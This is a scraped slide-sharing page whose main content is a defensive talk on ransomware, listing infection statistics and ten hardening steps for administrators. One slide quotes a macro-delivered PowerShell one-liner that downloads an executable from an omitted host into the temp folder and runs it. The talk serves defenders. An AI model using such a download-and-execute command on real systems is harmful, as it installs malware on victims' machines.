UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
DianaGray10
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
CatarinaPereira64715
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
Paul Groth
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
Cheryl Hung
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
Frank van Harmelen
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Tobias Schneck
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
Ralf Eggert
 

Recently uploaded (20)

IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3UiPath Test Automation using UiPath Test Suite series, part 3
UiPath Test Automation using UiPath Test Suite series, part 3
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
ODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User GroupODC, Data Fabric and Architecture User Group
ODC, Data Fabric and Architecture User Group
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMsTo Graph or Not to Graph Knowledge Graph Architectures and LLMs
To Graph or Not to Graph Knowledge Graph Architectures and LLMs
 
Key Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdfKey Trends Shaping the Future of Infrastructure.pdf
Key Trends Shaping the Future of Infrastructure.pdf
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*Neuro-symbolic is not enough, we need neuro-*semantic*
Neuro-symbolic is not enough, we need neuro-*semantic*
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)PHP Frameworks: I want to break free (IPC Berlin 2024)
PHP Frameworks: I want to break free (IPC Berlin 2024)
 

Ransomware 0 admins 1

  • 1. Ransomware 0: Admins 1 Kieran Jacobsen
  • 2. Kieran Jacobsen • Work at Readify • Technical Lead • Twitter: @Kjacobsen • Poshsecurity.com • PlanetPowerShell.com
  • 4. The impact of ransomware 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% Source: CyberEdge
  • 5. Threat Hirerachy 1. Malware (viruses, worms, trojans). 2. Phishing. 3. Insider threats. 4. APT. 5. Ransomware 6. Web Application Attacks. 7. SSL-encrypted threats. 8. DoS/DDoS 9. Drive-by & watering-hole Source: CyberEdge
  • 6. Impacted Verticals 0% 10% 20% 30% 40% 50% 60% 70% 80% Technology Financial Services Healthcare Government Source: CyberEdge
  • 7. The Rising Cost of Ransomware Bitcoin Exchange Rate (USD)
  • 8. How Does it Get in? Source: Osterman Research 0% 5% 10% 15% 20% 25% 30% 35% Email link Email attachment Website (non- social media) Social Media USB Stick Business Application Unknown
  • 10.
  • 11.
  • 12.
  • 13.
  • 14.
  • 15.
  • 16.
  • 17. cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('h ttp://<omitted>/2011/stinfo.pdf','%TM P%yvatu.exe');Start-Process '%TMP%yvatu.exe
  • 19.
  • 20.
  • 21. 1. Disable macros • Significantly impacts infection chain. • 31% of ransomware infections came from email attachments, typically Word document with macros. • Either: • Disable All • Disable macros marked as from the internet • https://decentsecurity.com/enterprise/#/block-office-macros/
  • 22. 2. Don’t run as admin • Significantly impacts infection chain. • Rethink developer and sysadmin privileges. • Old Rant by Jeff Atwood: https://blog.codinghorror.com/the-windows- security-epidemic-dont-run-as-an-administrator/
  • 24. 3. Configure UAC • UAC elevation requests are passed to the Antimalware Scan Interface (AMSI). • https://www.tenforums.com/tutorials/3577- change-user-account-control-uac-settings- windows-10-a.html
  • 25. 4. Open scripts in notepad • .ps1 files do not execute when double-clicked. • Change the following to open in notepad: • .bat (often overlooked) • .vbe and .vbs • .wsh and wsf • .js and .jse • http://www.dankalia.com/tutor/01002/0100201018.htm
  • 26. 5a. EMET • Enhanced Mitigation Experience Toolkit – New EOL date 2018-08-31. • Applies security mitigation technologies to running applications: DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom Up ASLR, Load Lib, Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR • Provides configuration SSL/TLS certificate pinning. • Provides ability to block untrusted fonts. • Group Policy ADM/ADMX files. • Bundled with recommended protections for a variety of Microsoft and 3rd Party Apps. • Disable protections on Chrome due to conflicts. • http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/
  • 27. 5b. Inbuilt protections in Windows 10 • Windows: • Windows 10, version 1607 and later • Windows Server 2016 • On for all 64bit processes: DEP, SEHOP and ASLR. • Configurable protections: DEP, DEP-ATL Trunk, SEHOP, Mandatory ASLR, Bottom Up ASLR • Configurable by, well, Group Policy. • https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override- mitigation-options-for-app-related-security-policies?f=255&MSPPError=- 2147217396
  • 28. 6. Deploy Chrome and Firefox • Reduces issues caused by users attempting to install 3rd party browsers. • Chrome is the leader of the pack, followed by Edge for security. • Chrome has ADM/ADMX files for Group Policy, Firefox has 3rd party Group Policy support • Chrome: http://goo.gl/2QvOT • Firefox: https://developer.mozilla.org/en- US/Firefox/Enterprise_deployment
  • 30. 7. Block Ads • Internet Explorer: https://decentsecurity.com/adblocking-for- internet-explorer-deployment/ • Edge: https://www.microsoft.com/en- us/store/p/adblock/9nblggh4rfhk • Chrome: https://decentsecurity.com/ublock-for-google-chrome- deployment/ • Firefox: https://decentsecurity.com/ublock-for-firefox- deployment/
  • 31. 8. Filter common email attacks • Identify common phrases and syntax in Phishing and Ransomware emails. • Quarantine them before they get to your users. • https://github.com/SwiftOnSecurity/PhishingRegex
  • 32. 9. Enable SPF, DKIM and DMARC • SPF: Domain owner specifies servers allowed to send email. • DKIM: A domain assets responsibility for sending emails. • DMARC: Combined SPF + DKIM, allows policy assertions and collection of data. • https://dmarc.org/presentations/Email-Authentication- Basics-2015Q2.pdf
  • 33. 9. Enable SPF, DKIM and DMARC Alexa Top 500 - DMARC Usage DMARC No DMARC Source: Detectify
  • 34. 10. Implement SYSMON Sysmon from Microsoft ( https://technet.microsoft.com/en-us/sysinternals/sysmon ) + Configuration from Swift on Security ( https://github.com/SwiftOnSecurity/sysmon-config/ ) + Free SIEM from Gray Log ( https://www.graylog.org/ ) + Sysmon for Graylog ( https://github.com/ion-storm/Graylog_Sysmon ) = Awesome Dashboard